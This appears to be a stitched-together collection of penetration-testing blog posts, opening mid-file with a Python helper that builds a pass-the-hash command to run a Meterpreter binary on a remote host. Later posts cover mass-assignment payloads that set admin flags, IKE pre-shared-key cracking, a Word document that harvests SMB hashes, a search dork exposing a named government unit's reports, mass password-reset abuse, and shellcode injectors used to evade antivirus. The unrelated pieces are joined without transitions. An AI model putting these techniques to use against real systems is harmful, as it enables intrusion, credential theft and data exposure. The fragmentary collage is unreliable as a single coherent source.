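    """Split a pwdump-format line (user:rid:LMHASH:NTHASH:::) into (user, lm, nt)."""
    parts = line.strip().split(":")
    return parts[0], parts[2], parts[3]

def pth_winexe_cmd(pwdump_line, host, command):
    """Build an argv for a pass-the-hash winexe run (syntax is an assumption)."""
    user, lm, nt = parse_pwdump(pwdump_line)
    return ["pth-winexe", "-U", "%s%%%s:%s" % (user, lm, nt),
            "//%s" % host, command]

# Empty-password NT hash shown purely as a recognizable sample value
line = "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"
print(" ".join(pth_winexe_cmd(line, "10.1.1.20", "C:\\temp\\met.exe")))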

When application security was still in its infancy, there were discussions on how to protect applications from newly discovered injection vulnerabilities. "Sanitize input" was a popular solution that rolled off the tongue nicely and was not overly complicated to explain. It was also a very generic solution that would (hopefully) be part of a more complete approach.

As much as "sanitizing input" makes sense, so does writing your code in a way that allows you to handle failure safely. This way, when the unexpected does happen, an entire operation doesn't fall down, introduce a bug, or propagate unsafe data.

Question: When does this approach fail miserably?
Answer: When it is the only approach you have.

The OWASP Top 10 categorizes XSS and SQL injection separately, but as an attacker, you are injecting data that is handled insecurely by application code; in that sense, XSS is really just another form of injection. On that note, let's discuss two manifestations of injection: SQL injection and HTML injection (XSS). I'd like to demonstrate other ways to think about or handle data beyond just "sanitize input". If you take away nothing more from this article, I'd like it to be that applications are unique, that there is a level of complexity to design choices and solutions, and that there are more options than "sanitize input" available.

SQL injection: "Save your one-liners for the bar". Parametrization of database queries is a classic method for handling queries safely, and in many cases more efficiently. From a security standpoint, parametrized queries help solidify the boundary between user data and SQL statements. They ensure that data submitted by the user is separated from the actual database query and won't interfere with the SQL code, and ultimately the database.

Example of lazy code....

http://www.example.com/example.php?user_name=gevans

$uname = $_GET['user_name'];

....and this is the classic example everyone shows, nothing new here, that illustrates a SQL injection flaw where the data ($uname) is included directly in the SQL statement.

"SELECT user_id from users where username = $uname;"

This programming flaw has destroyed the boundary between the SQL command and user-supplied input. Because the user data is folded into the query string, it is no longer clear to the SQL server which part was supplied by the developer and which was supplied by the user. The whole query can fall apart with a single appended quote. This is not just a vulnerability; this is bad programming. Sure, it takes one line to write the query, but there is no further sanity checking here. The string is formed, sent to the server, and executed as SQL. How are parametrized queries different?

Parametrized queries separate the data from the query so that we as coders don’t miscommunicate our intentions to the database server. How does it work? The majority of the query is sent to the server MINUS the actual user submitted data. So, the query is prepared (meaning sent to the server), a response comes back with a token (minus MySQL as I understand it), and THEN, the variable is sent to the server with the token and a SQL query executes. This means the expected query and actual data that we've gathered from the user are separated prior to execution.

Let's provide a visualization:

// Pass in db credentials as well as the host and the database we'd like to connect to
$conn = new PDO("mysql:host=localhost;dbname=mydb", $db_user, $db_pass);

$sql = "SELECT user_id FROM users WHERE username = ?";

// Execute the query, taking in the variable data ($uname) from the user
$q = $conn->prepare($sql);
$q->execute(array($uname));
$object = $q->fetchColumn();

As you can see, the $sql statement is prepared and the server knows exactly what it should look like. Next, the SQL statement is executed, passing in the variable value in place of the "?" (shown above). By specifying that question mark, you tell the db, this is my statement but I don't know what the value will be.....I'll give you that on the next call.
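The same prepare-then-execute separation exists in just about every language. Here's the idea sketched with Python's stdlib sqlite3 module; the table and values are made up for the demo, and the "?" placeholder keeps the user data out of the SQL text entirely, just like the PDO example:

```python
import sqlite3

# Throwaway in-memory database with one demo row
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user_id INTEGER, username TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'gevans')")

uname = "gevans' OR '1'='1"  # hostile input stays inert as data

# The "?" placeholder means the driver never splices uname into the SQL text
row = conn.execute(
    "SELECT user_id FROM users WHERE username = ?", (uname,)
).fetchone()
print(row)  # None: the injection attempt was treated as a literal username
```

Swap in uname = "gevans" and the same statement returns the row, because the data changed but the query never did.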

Let's examine XSS. Again, something I hear a lot is "sanitize your input". Some people even go as far as "whitelist" versus "blacklist". Okay, great, but that is not extensible, and ultimately context matters. What do I mean? It is a very one-sided approach with a lot of assumptions. Let me draw a picture for you. The understanding, as of right now, is that the data comes in one place and is potentially echoed in another. So the model looks something like this:

A typical example would be a registration form. You sign up with your first name, last name, etc. Upon successful authentication to the application, you notice a little message at the top right: "Welcome, Ken!". I wonder where that value came from? When we registered, our information was stored in the db, later extracted after login, and shown on the page. Now, we should be safe, right? Even if we had attempted to place JavaScript in the first-name value upon registration, it wouldn't have mattered..... We sanitized!!! Two months later, a user complains that they signed up with a misspelled username and would like the ability to change it. A new developer is assigned the task of adding the ability to edit your first and last name and does so. The new developer's assumption is that we are going to safely handle that data when it is rendered to the user. But we aren't. We sanitized the input and didn't bother with handling the output. Our model has changed from Input/Output to......

So with one additional point of input, our model gets (very slightly) more complicated. Now imagine adding multiple points of input and multiple points of output. Now split input into data entry (processed) and storage handling (stored in the db), and then do the same for output. While we are at it, let's throw in a web service that consumes the data as well. It becomes very easy to see how "sanitize input" doesn't scale, isn't a sure-fire solution, and really oversimplifies the problem for those who are looking to either receive or give an easy answer.

In summary, please join me in the fight to stop the mindless regurgitation of old material.

Cheers,
Ken

Over the last two cycles of the OWASP Top 10, insecure direct object reference has been included as a major security risk. An object reference is exposed, and people can manipulate it to access other objects they aren't supposed to. But an apparently lesser-known problem is when the object itself is directly exposed. This happens when an object maps user-controlled form data directly to its properties without validation.

Perhaps this issue gets less press because every language calls the problem something different. In Ruby, people call it mass assignment. In .NET and Java it's often referred to as reflection binding. Regardless of name, it is how the object obtains its data that is of concern.

In ruby, vulnerable code might look like this:

@foo = Foo.new(params[:foo])

The params call wants to make life easy and will automagically map any form data that matches the object’s parameters for you—unless you say otherwise. This is a very common convention used in MVC frameworks, because manually mapping a form POST to an object is annoying. The problem here is that it makes no difference to the controller whether you’ve exposed that field in the presentation layer. It just has to exist on the object.

In other words-- if you were updating a product quantity for your shopping cart, you might be able to change the price by guessing that a price field exists. Just add the price field to your POST parameters and it might override the value. This approach can be effective—but it is mostly a guessing game at that point. Some frameworks let you throw tons of arbitrary data and whatever sticks, sticks. Others will barf on invalid parameters.

There is a second route, however, which is why this vulnerability deserves more attention. When I said that you are allowed to map to anything on the object, I meant it. You can map complex objects to other complex objects, as long as they relate to each other. Let's look at an example in C#:

Behind the scenes, the framework maps all of the form data directly into the foo object. Developers also sometimes do this directly by calling the UpdateModel() function. In either usage, if someone sent a malicious POST to the “Create” view:

Foo.Bar.name="hello"&Foo.Bar.is_admin=true&Foo.name="myfoo"

You'd end up with a fully fleshed-out object where:

Foo.name = "myfoo"
Foo.Bar.name = "hello"
Foo.Bar.is_admin = true

The Bar object is instantiated automatically through its empty constructor, and its properties are mapped as well. Any reference the exposed object has, you can bind to. This also works for arrays of simple or complex types. If instead of a single instance you had an array or List<Bar>, you would just do the following:

Foo.Bar[0].name="hello"&Foo.Bar[0].is_admin=true

Without any other validations, this is all kosher.
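The binding behavior those frameworks rely on is easy to sketch: a naive binder that walks dotted form keys and sets whatever attributes it reaches, with no whitelist. The Foo/Bar classes below are hypothetical Python stand-ins for the C# example, not any real framework's binder.

```python
class Bar:
    def __init__(self):
        self.name = ""
        self.is_admin = False  # never exposed in any form

class Foo:
    def __init__(self):
        self.name = ""
        self.bar = Bar()  # instantiated via the empty constructor

def bind(obj, form):
    """Map dotted form keys onto obj, nested objects included, no whitelist."""
    for key, value in form.items():
        parts = key.split(".")
        target = obj
        for p in parts[:-1]:
            target = getattr(target, p)  # walk into nested objects
        setattr(target, parts[-1], value)
    return obj

# A malicious POST: the form only showed "name", but the binder doesn't care
foo = bind(Foo(), {"name": "myfoo", "bar.name": "hello", "bar.is_admin": True})
print(foo.bar.is_admin)  # True -- a field the presentation layer never exposed
```

The controller sees a perfectly valid Foo; nothing distinguishes the extra field from a legitimate one.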

In the wild I’ve used this attack to escalate privileges by updating my profile and walking down to a permissions table. I’ve also run across places where you could register every user to come to an event. And another instance where you could take over other people’s blog posts simply by editing your own profile.

If you search for this during tests, here are some key things I’ve learned:

This vulnerability is best identified with access to source code—and very few developers seem to protect against it.

When reviewing code, pay attention to how the constructor works and how fields are set on the object. Some properties are set via functions and you can’t bind them directly. Other objects don’t have empty constructors. This causes the attack to fail.

I frequently find this vulnerability on “update” and “create” controller actions.

You can, and I have, found this without source; it's just harder. You do so by creating a loose type map through browsing the site.

You can create a type map by following a process like this:

Go to the object's "create" page and note all the form fields there. That is your basic "object". As you see these objects in other places on the site, they might reveal more about their structure.

The site will guide you in what you need to know about object relationships. If you are looking at your cart, and it has a list of products & their details-- the cart object has a list of products.

For everything else, there are common object relationships you can just assert. Carts do generally have products, just as people generally have permissions. Take some time and look over common object models on the interwebs.

This attack route exists on pretty much every MVC based framework. In particular, Spring, Struts, MVC.Net and Ruby on Rails are all vulnerable. Maybe others, but those are so popular I’ve not really looked much deeper into it.

It is true that developers can prevent this by whitelisting specific fields to bind, but they don't. The whole point of the convenience functions is convenience. If you've built an MVC application and didn't go out of your way to protect against this, you are most likely vulnerable.

Stephen, @averagesecguy, wrote a post on owning a ColdFusion server. It's pretty good, and he wrote some code to help things along.

Code: https://github.com/averagesecurityguy/scripts

I thought I'd add to the conversation with some stuff I found doing CF research. The code he wrote and the Metasploit module work great if things are in their default locations. Of course, this will never be the case when you are on a PT and need to break into that mofro.

Anyway, there is a misconfiguration that, when it's present, can greatly help you exploit that locale traversal attack. A lot of the time you can get the sha1.js and verify that the patch is not applied.

Anyway, more than once I've gotten that far, but the host was Linux and locating the password.properties file failed. You're essentially guessing blind. What I discovered is that sometimes the componentlist.cfm file [Site/CFIDE/componentutils/componentlist.cfm] is available. It looks like this:

Click on one of the components and you get the full path to the installed component:

Not the best example, because stuff is where we would expect it to be. This one is better:

Now you know where to direct that directory traversal to get the proper file.

So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.

We now know that we want to go back and enumerate/dump the column values from dbo.mytable in database MYDATABASE to see if there is anything good there. Most likely there is also a userID or LogonId in there we need to extract as well.
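The column hunt itself is just a metadata query; against MSSQL you'd be pulling from information_schema.columns. Here's the same idea sketched with stdlib sqlite so it's runnable anywhere; the table and column names are made up.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE mytable (LogonId TEXT, UserPassword TEXT, note TEXT)")

# MSSQL equivalent of what we're doing below:
#   SELECT table_name, column_name FROM information_schema.columns
#   WHERE column_name LIKE '%password%'
tables = [r[0] for r in conn.execute(
    "SELECT name FROM sqlite_master WHERE type='table'")]

hits = []
for table in tables:
    for col in conn.execute("PRAGMA table_info(%s)" % table):
        if "password" in col[1].lower():  # col[1] is the column name
            hits.append((table, col[1]))

print(hits)
```

Each hit gives you a (table, column) pair to go dump through the injection point.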

In IKE aggressive mode, the authentication hash based on a pre-shared key (PSK) is transmitted in response to the initial packet of a VPN client that wants to establish an IPsec tunnel (HASH_R). This hash is not encrypted. It's possible to capture these packets using a sniffer (for example tcpdump) and start a dictionary or brute-force attack against the hash to recover the PSK.

This attack only works against IKE aggressive mode, because in IKE main mode the hash is already encrypted. For this reason, IKE aggressive mode is not very secure.
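The cracking step itself is just an offline HMAC loop. This is a deliberately simplified sketch: real IKE derives SKEYID with the negotiated PRF over the exchanged nonces and HASH_R covers more exchange fields than shown here, and all the values below are made up. But the shape of the attack (key each guess, compare against the sniffed hash) is the same.

```python
import hashlib
import hmac

# Pretend these came off the wire: plaintext exchange data and HASH_R
captured_data = bytes.fromhex("aabbccdd")  # stand-in for Ni|Nr etc.
real_psk = b"letmein"
captured_hash = hmac.new(real_psk, captured_data, hashlib.sha1).digest()

def crack(wordlist):
    """Try each candidate PSK offline against the captured hash."""
    for word in wordlist:
        guess = hmac.new(word.encode(), captured_data, hashlib.sha1).digest()
        if hmac.compare_digest(guess, captured_hash):
            return word
    return None

print(crack(["password", "secret", "letmein"]))
```

Because everything needed is captured in plaintext, the gateway never sees a single failed login while you grind through the wordlist.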

The default charset is "0123456789abcdefghijklmnopqrstuvwxyz" and can be changed with --charset=.

$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking mode
Brute force with 63 chars up to length 5 will take up to 992436543 iterations
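That iteration figure is easy to sanity-check: the quoted number is exactly 63**5, the candidate count at the maximum length alone (note the charset passed above contains a doubled '3', which is how it reaches 63 characters instead of 62).

```python
# Reproduce psk-crack's estimate: 63-character set, max length 5
charset = "01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
print(len(charset))       # 63
print(len(charset) ** 5)  # 992436543
```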

You may find yourself wanting a bit more flexibility or options during brute-forcing or dictionary attacks (i.e. character substitution). For this you'll need Cain. The problem I ran into was that Cain is a Windows tool and ike-scan is *nix, and I couldn't get the Windows build that is floating around to work. Solution: run in VMware and have Cain sniff on your VMware interface. The PSK should show up in the passwords section of the sniffer tab; then you can select it and "send to cracker". It's slow as hell, but more options than psk-crack.

Someone asked me how to embed an HTML link to an SMB share into a Word doc. The end result would be to use the capture/server/smb or exploit/windows/smb/smb_relay modules. Easy, right? Well, it wasn't THAT easy...

In Office 2010, when I'd go to pull a picture into the document by adding it from a network share, the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some HTML to the document.

I ended up adding the following code to the Office document (replace "[" or "]" with "<" or ">"):

Once that is done, go to Insert --> Object --> Text from File --> select your HTML file.

Once that is done, save and open the document. If all is well, you'll see the SMB requests to the network share you specified, and if you are running the SMB capture module you should see some traffic. The screenshot below shows the goods... I do realize the LM hashes are missing from the smb capture screenie (disabled on Windows 7?) but I was too lazy to install Office on a VM just for the screenshot.

I am now working on a pentest for a government unit in Hong Kong; they simply expose numerous sexy confidential reports in their Oracle Reports Server:

I would like to highlight two interesting points:

1. Execute servlet commands
http://reports.somethingoracle.com/reports/rwservlet

2. Get some confidential reports from Google or the target
inurl:reports/rwservlet

For example, you could learn about other project funds from the government:
https://app.somethingoracle.com/reports/rwservlet?epm+report=epm345_stip_report.rdf+p_stip_year=2009+p_incld_transit=YES+p_break_type=R+p_draft_rept=NO

We work in a variety of large environments, networks from 30k hosts up to 100k hosts, and like many of you, one of our jobs is to provide security advice to our customers. In the infosec industry this advice often involves recommending things like patching, AV selection, FW rules, SIEMs, reverse engineering tools, app review, etc. (and most often purchasing more assessments ;)

However, what we find most often is that many places aren't even ready to implement advanced security, because their basic IT operations are not in order. How many times have you pen tested a customer and heard "oh yeah, that belongs to the desktop support group, good luck getting anything done there"?

Many times we have generated a number of serious alerts on a sensitive server, including the use of stolen cached domain admin credentials, password dumping tools, and even rebooting the server itself. We will see a ticket generated in the support system; an admin looks at the server, fills out the ticket, and says "AV caught the attempt and the server came back up fine", and the ticket is closed. Often users won't report anything suspicious, even when our actions are blatant, because they are so accustomed to everything being broken and unstable.

Beyond automating Patch Tuesday and keeping AV up to date, and definitely beyond exploits, memory protections, and reverse engineering, the most serious problem in security is that organizations lack even basic capabilities for managing their enterprises. Who's still running XP SP2 (a vastly less secure OS than Win7) because of the expense involved in updating the enterprise? Businesses need security help that is willing to negotiate the maze of business concerns and understand enterprise IT needs, in addition to being technically astute in security.

We've been to large companies where getting a network port to plug into to start testing can take two weeks. Where finding someone who understands how servers are configured, or even how many servers there are, can be a challenge. Environments that don't know what computers are on their own networks. Sure, security needs to be built into the whole process, but I wonder: have we focused too much on what we want to do and not enough on what the customers actually need?

It's not sexy or headline-generating work, but little is more critical.

After testing a fair number of mobile applications, I thought I would share three of the most common vulnerabilities I've come across thus far. In regards to scope, when referring to "mobile applications" we really mean both the mobile application and its web service.

Moral of the story: if a mobile device is lost or stolen (which happens way more often than it should), credentials are ripe for the picking. Physical access is not always required, of course. Anyway, pretty much anyone who has spent two minutes on "The Googles" can find out where you are storing your metaphorical "house keys". There are solutions to this problem; for instance, I've heard great things about Android-SQLCipher, and don't forget about platform API solutions as well (if you're not a fan of third-party libraries).

Crappy session handling:

I don't think this title will ever make its way onto an OWASP Top 10, but it certainly reflects the issue accurately. Not to say this is limited to mobile apps & web services, far from it; it is just very common amongst them.

Examples -

So, here is a fun one: pure basic-authorization schemas. You typically see this in a SOAP-service-to-mobile-app architecture, but obviously the two aren't mutually exclusive. For those not familiar with basic authorization, it means the user's credentials are sent in the standard basic-auth format (Base64-encoded user:password). The problem occurs when, instead of leveraging a session handling schema, the user/password combo is sent with every request to the web service as a means to authenticate the user for the requested resource. There are many disadvantages. Namely, if SSL isn't in play, you've increased the likelihood that the credentials will be stolen (ahhh... lattes, croissants, and good ol' packet sniffing). Additionally, because you haven't a session to destroy, there is no inactivity lock-out. Typically the creds are stored (plain-text, of course) on the device, retrieved by the app, and then sent on a per-request basis. This means the person on that device may not be the person you intended to view potentially sensitive information.
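To see how little protection the basic-auth format provides on its own, here's the full round trip in a few lines of Python (the credentials are made up):

```python
import base64

# What "basic authorization" puts on the wire with every single request:
# just user:password, Base64-encoded
header = "Basic " + base64.b64encode(b"ken:S3cret!").decode()
print(header)

# Anyone who can read the request reverses it trivially
encoded = header.split(" ", 1)[1]
user, password = base64.b64decode(encoded).decode().split(":", 1)
print(user, password)
```

Base64 is an encoding, not encryption; without SSL, every request is effectively a cleartext credential replay.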

Another big session-related issue is leveraging device identifiers or good old client-side data to control a user's privileges. Imagine the classic parameter tampering (userid=100 becomes userid=101), but this time with the UUID of an iPhone. The classic session identifier -> user map -> role enforcement still works, so it is unnecessary to build your schema this way.

API Keys, Test Accounts and Dirty Laundry

From test-account credentials along with the test URL (which provided juicy insight into the inner workings of an architecture) to the personal email addresses of developers (think social engineering/username enumeration), the list of things put into source code can still be fairly surprising.

These applications are reversible, especially Android apps; between dex2jar, apktool, and jd-gui, it's pretty easy to see things not intended for your eyes. Developers need to scrub sensitive data prior to sending the code out for production and treat data like it's a public blog post: everyone can read it. Oh, and make sure you aren't hard-coding API or encryption keys!

Okay, so those titles will never end up on a Top 10, but the content has! I would encourage those interested to check out the OWASP Mobile Top 10 Risks, and please, don't forget the project always needs additional collaborators.

[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92

+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open

[i] Plugin ID 38157

Synopsis: The remote web server contains document sharing software.

Description: The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personnel can log into this site.

See also: http://www.microsoft.com/Sharepoint/default.mspx

Solution: Make sure proper access controls are in place.

Risk factor: None

Plugin output: The following instance of SharePoint was detected on the remote host:

Similar to his other TED talk but worth the 20 minutes. It's good up to "fixing things"; I'm not sure I agree with his fixes. I do agree with a more unified way to fight/arrest cybercriminals, but bottom line, it's still way too easy to break into stuff and still too easy to conduct credit card fraud. We need to address some of that as well.

Also, I think plenty of people would disagree that anything Mac is "safe" because of market share.

I remember many years ago writing my first buffer overflow, a standard stack-bug privilege escalation in (I think) RedHat 7.x, which I thought was awesome. I remember writing my first SEH overwrite on Windows, marveling at POP POP RETs, and spending hours pouring through memory in WinDbg wondering why my shellcode was getting trashed. I even remember the moment when I "got" return-to-libc. Somewhat in contrast to many "researcher" exploit developers and bug hunters, I also break into computers, lots of them. At last count I was well over the 100,000 mark of computers I have personally gotten into, taken control over, and extracted data from. This is not to tell you how awesome I think I am (I'm not; there are IRC script kiddies with 10x the amount of compromises under their belt) but rather to provide a statistical frame of reference for what I am going to say next.

Several years ago I decided to pull back from the memory corruption rat race, but I never really talked about why. When breaking into computers, I almost never use memory corruption bugs. I occasionally, but rarely, develop new memory corruption bugs into exploits. Memory corruption bugs, IMO, are a bad long-term return on investment. Sure, someone like Charlie Miller can crank out 100 Adobe product crashes in the blink of an eye, but how much skilled time investment is required to take a bug from a crash to a highly reliable, continuation-of-execution, ASLR/DEP-bypassing exploit ready for serious use? Average numbers I have heard from friends who do this all day long are 1-3 months, with 6 months for particularly sticky bugs. How many people are there who can do this? Not many. So you have a valuable resource tied up for months at a time to produce a bug which may get discovered and published in the interim (a process you have no real control over), patched, and killed. When was the last time you heard about a really bitchin Windows 7 64-bit remote? It's been a while.

So you put in all that time and investment to produce a nice 0day, only to watch it get killed. Then you start looking for the next one. What's the going price on the market for an 0day? 100k, 200k, etc. Expensive for something with a potentially limited life, putting aside for a moment the fact that people don't patch anyway.

So what do I like instead? I like design flaws that are integral to the way a system works and are extremely costly to fix, that don't barf a bunch of shellcode across a potentially IDS/IPS-ridden wire, that simply take advantage of the way things are supposed to work anyway. Lest you think I spend all my time keylogging "password123", let me give some real-world examples:

- Proprietary and custom hardware/OS and software system used for some interesting applications. The system has a UDP listening service. After reversing the service binary, we discovered that it takes a cleartext, unauthenticated protocol blob. The process then, based on what's in the blob, calls another process that execs a variety of system commands. One of these commands sends a message to the various systems in the network to mount a given network file system and load specified software. So we craft our own protocol blobs, build our own network file system with specially crafted malicious software, and take over all the systems at once. We spoke with the designers of the system about what it would take to change it, and due to various rules and policies we were looking at 18-24 months to push out a redesign, and that's after whatever time was needed to develop the new system.

- Foreign client/server ERP system that handles supply chain and even has some tie-ins with SCADA components. Authentication works as follows: the client enters a username and password. The client app connects to the server and sends an authentication request with the provided username. The server checks whether the username exists, and if so, sends a hash of the user's password back to the client app. The client app checks whether the local password hash matches the one sent from the server, and if it matches, the client informs the server that the account is valid and the server then successfully authenticates the client. So yes, very broken client-side authentication. But to figure that out we had to analyze the network traffic between the two as well as reverse engineer the client application, and binary-patch the client app to always respond with a positive match. And the data or effects gained from compromising this system are way more interesting than your Windows 7 home gaming system.

- Large company virtualization cluster using hardware from a well-known vendor. The servers provide remote console/KVM functionality for management. Because of a previously unknown authentication vulnerability in the remote console app, we were able to boot the server to remote media under our control (i.e. a Linux boot disk). We had reverse engineered the virtualization technology in question and developed a custom backdoor, which we then implanted by mounting the hard drive from our remotely loaded Linux boot environment, allowing us to take control of the cluster.

With the exception of the last server reboot, none of the above examples generated any traffic or logs that were flagged by any security system. No IDS or AV to evade. No DEP or ASLR to get around. And a low chance of these bugs getting killed, due to the cost and time frame involved in fixing them. I believe that researchers should consider putting some of their time and resources into these types of design flaws as well as into sophisticated post-exploitation activities. The market value for memory corruption bugs will go up for a while, but so will the difficulty and time required to find them, and we have often seen patch release times decrease as well. Eventually that bubble will burst.

V.

Dave Ferguson has beaten up on forgotten/reset password functionality for some time and recently participated in an OWASP podcast where he discussed these problems. The podcast reminded me of some techniques I've used in the past which have been successful and may be worth sharing. Accessing other users' accounts via insecurely coded forgot/reset password functionality is more common than you might think.

This post focuses on analyzing entropy and inline password resets, two major problems with forgot/reset password functionality. To do this, we have to automate both requesting a forgotten password hundreds of times and parsing through all of the e-mails we receive. Thanks to the macro support recently added to Burp (thanks PortSwigger), less effort is required on our part when an application employs anti-automation features to prevent such attempts.

For those not familiar with BurpSuite's macro support, let's walk through this.

So here is a picture of the email reset we've been sent:

Initiating a password reset is a four-part request/response sequence, and that sequence is saved in our proxy history. We need to navigate to Options > Sessions > Macros > New and highlight the four messages saved in the proxy history to create and configure the new macro.

Take a look at the screenshot below:

Okay, now we need to configure each individual request/response to extract the data we want. We have to grab a JSESSIONID and a Struts token. Let's highlight the first request/response and configure it. Here is an example of configuring one of the items:

You'll notice that for the first request I've chosen not to use cookies in the cookie jar. This is because I want to start the sequence clean, without a cookie. Notice that struts.token.name and struts.token are dynamic and changing, so we derive these from the response. The rest are preset values like email and birthdate (no, not my real birthdate). One important thing to notice is that I've decided to uncheck URL-encode for the email portion. It is already URL-encoded, so there's no need; otherwise it will cause problems.

Name the macro. The next piece requires you to add the macro to a session handling rule. Again, Options > Sessions > Session Handling > New. Highlight the macro you'd like to use.

Next, you'll need to add the pages to scope:

Now send the original, first request (I do this from the proxy history portion of Burp) over to Intruder, select null payloads, and set the count to a number large enough to collect a big sample of passwords so we can review their entropy. You'll see below that Intruder is configured to send the password reset sequence 800 times. Again, this will initiate the macro each time, so you are essentially resetting the password 800 times.

Next we need to retrieve the emails from Gmail and review them for entropy. Here is a script I've written to retrieve emails from Gmail, parse out the password values, and write them to a file called tokens.txt:

Lines 11-17:

Line 12: File we will place all of our emails in (make sure you create an inbox folder)
Line 13: Initialize the POP class
Line 14: Enable SSL
Line 15: Replace with your username and password
Line 16: Call the check_for_emails method with the pop object

Lines 20-27:

Lines 21-22: If we have no emails, print that fact to the screen
Lines 24-25: We have emails; print that fact to the screen and call the place_emails_into_file method with the pop object

Lines 31-36:

Line 31: Iterate through the pop array
Line 32: Open the file (line 12)
Line 33: Write the messages to the file
Line 36: Call the create_file_with_tokens method

Lines 40-53:

Line 41: Create a new_file object, which is a file called tokens.txt
Line 42: Create a read_file object, which reads the inbox/emails.txt file from line 12
Line 43: Begin reading each line from read_file
Lines 44-46: If the line matches "password: somepassword", write it to the file
Line 53: Kick the whole thing off
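The original script isn't reproduced here, so this is a hedged reconstruction of the workflow described above: fetch mail over POP3/SSL, dump it to a file, then grep out the reset passwords. The host, credentials, and the "password:" line format are assumptions; adjust them to match your target's reset emails.

```ruby
INBOX  = 'inbox/emails.txt'
TOKENS = 'tokens.txt'

# Pull every message down over POP3/SSL and append it to INBOX.
# The Gmail host and credentials are placeholders.
def fetch_emails(username, password)
  require 'net/pop' # bundled gem on Ruby 3.1+
  pop = Net::POP3.new('pop.gmail.com', 995)
  pop.enable_ssl
  pop.start(username, password)
  if pop.mails.empty?
    puts 'You have no new emails'
  else
    File.open(INBOX, 'a') { |f| pop.each_mail { |m| f.write(m.pop) } }
  end
  pop.finish
end

# Grep the saved mail text for lines like "password: hammer7" and
# return just the password values.
def extract_tokens(text)
  text.scan(/^password:\s*(\S+)/i).flatten
end

# Usage (the network call is commented out):
# fetch_emails('you@gmail.com', 'app-password')
# File.write(TOKENS, extract_tokens(File.read(INBOX)).join("\n"))
```

The parsing is kept in its own method so you can point it at any saved mailbox dump, not just one fetched over POP3.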

Review the tokens.txt file

We can see that the new passwords sent aren't very random. We could load this into Burp Sequencer, but there really isn't any point when it is this easy. It is obvious that the developer has two separate arrays of words and another array of numbers. They pick "randomly" from that pile and concatenate the values. Here is the actual line of code I wrote to do this, and yes, this is a real-life example that I've come across:
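The generator itself isn't shown above, so here is a hedged sketch of the pattern being described: two small word lists plus a number list, one pick from each, concatenated. The word lists are made up for illustration; the point is the tiny keyspace, not the exact words.

```ruby
# Hypothetical reconstruction of a low-entropy reset-password generator:
# two word arrays and a number array, sampled and concatenated.
WORDS_A = %w[red blue green happy lucky]
WORDS_B = %w[hammer saw drill wrench nail]
NUMBERS = (1..9).to_a

def weak_password
  WORDS_A.sample + WORDS_B.sample + NUMBERS.sample.to_s
end

# 5 * 5 * 9 = only 225 possible passwords -- trivially guessable
# once you've harvested a few samples and spotted the pattern.
```

With a keyspace that small, a few hundred harvested resets expose the whole scheme, which is exactly what the tokens.txt review shows.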

Factors that could slow us down:

1) If we can't enumerate e-mail addresses somehow. An example of enumeration would be if you type in a username/e-mail address and the site tells you it doesn't exist. Now we know who DOES exist on the system.

2) This particular site requires a birthdate along with the email address. This is difficult but not impossible. If we know the e-mail address exists it is a matter of guessing the birthdate (automate w/ Intruder).

3) After we've reset other users' passwords, we need to guess the password (made MUCH easier by reviewing the entropy). If an account lock-out policy is enforced (after a small number of incorrect password submissions), the account may be locked out, leaving us without access. That is no fun.

Even if the reset or forgotten password function doesn't send us a clear-text password it may send us a reset link. It is important to review the randomness of that link.

Here is an example of loading the tokens file in sequencer:

Summary:

We've bypassed the Struts token and the multi-step password reset flow, which might have been intended to slow us down. We've collected all of our emails and parsed them for passwords/tokens/links. We've reviewed the entropy manually (in this case), but we can also do this with Sequencer. Now we have a way to guess passwords more efficiently, which, in combination with other flaws, leaves us just a short time away from compromising accounts.

Hi dudes, we have put together a study on Facebook forensics; please feel free to reference and enjoy it here. Special thanks to Captain for leading this study, to Taku and Sweeper for the analysis, and to Leng for the detailed paper review: http://goo.gl/2TIr9

You may find yourself needing to do process injection outside of metasploit/meterpreter. Good examples are when you have a Java meterpreter shell, when you have access to a GUI environment (Citrix), and/or when AV is going all nom nom nom on your metasploit binary. There are two public options I have found: shellcodeexec and syringe.

Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject it into memory (into a process, for syringe) to get your meterpreter shell.

shellcodeexec is a small script to execute in memory a sequence of opcodes.

"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."

"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."

"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"

Ken "cktricky" Johnson has agreed to join the carnal0wnage/attackresearch blog and I can't be more excited. Ken brings tons of webappsec kung fu and is the core developer for wXf. He should be adding lots of webappsec goodness.

Strategic Security has teamed up with Net-Square to provide the most comprehensive exploit development course package available to the public. Occasionally similar courses are offered privately to various three letter agencies and large financial institutions.

Exploit development is often considered the most difficult area of focus in the entire field of IT security. It requires both a broad range of skills and deep level of knowledge in Networking, Operating Systems, and Programming. Now you too can learn what has long been thought to be "Black Magic" by many from one of the top practitioners and trainers in the world.

How is this course put together? The course is actually a two-week package deal designed to both teach the fundamentals of modern exploit development and give the student ample guided practice time with the instructor to actually get proficient.

